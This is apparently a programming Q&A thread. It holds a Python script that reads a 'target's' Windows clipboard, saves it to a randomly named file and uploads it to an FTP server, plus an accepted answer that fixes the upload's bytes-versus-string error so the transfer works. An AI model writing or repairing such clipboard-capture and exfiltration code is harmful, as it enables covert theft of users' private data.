# Send file contents over ftp python

Tags: python, ftp

I have this Python Script

```
 import os 
 import random 
 import ftplib 
 from tkinter import Tk 

 # now, we will grab all Windows clipboard data, and put to var 
 clipboard = Tk().clipboard_get() 
 # print(clipboard) 
 # this feature will only work if a string is in the clipboard. not files.
 # so if "hello, world" is copied to the clipboard, then it would work. however, if the target has copied a file or something 
 # then it would come back an error, and the rest of the script would come back false (therefore shutdown) 

 random_num = random.randrange(100, 1000, 2) 
 random_num_2 = random.randrange(1, 9999, 5) 
 filename = "capture_clip" + str(random_num) + str(random_num_2) + ".txt" 
 file = open(filename, 'w') # clears file, or create if not exist 
 file.write(clipboard) # write all contents of var "foo" to file 
 file.close() # close file after printing 

 # let's send this file over ftp 
 session = ftplib.FTP('ftp.example.com','ftp_user','ftp_password') 
 session.cwd('//logs//') # move to correct directory 
 f = open(filename, 'r') 
 session.storbinary('STOR ' + filename, f) 
 f.close() 
 session.quit()
```

The file will send the contents created by the Python script (under variable "filename" eg: "capture_clip5704061.txt") to my FTP Server, though the contents of the file on the local system do not equal the file on the FTP server. As you can see, I use the ftplib module. Here is my error:

```
 Traceback (most recent call last): 
 File "script.py", line 33, in<module> 
 session.storbinary('STOR ' + filename, f) 
 File "C:\Users\willi\AppData\Local\Programs\Python\Python36\lib\ftplib.py", line 507, in storbinary
 conn.sendall(buf) 
 TypeError: a bytes-like object is required, not 'str'
```

Comment: Sorry, it's not literally the <br /> tags

Comment: Why did you have them there in the first place? I use a quick regex to replace them all, so it's fixed now...

Comment: thanks, I didn't quite know how to make those go away (new update on Stack, srry)

Answer (score 0, accepted):

Your library expects the file to be open in binary mode, it appears. Try the following:

```
f = open(filename, 'rb')
```

This ensures that the data read from the file is a `bytes` object rather than `str` (for text).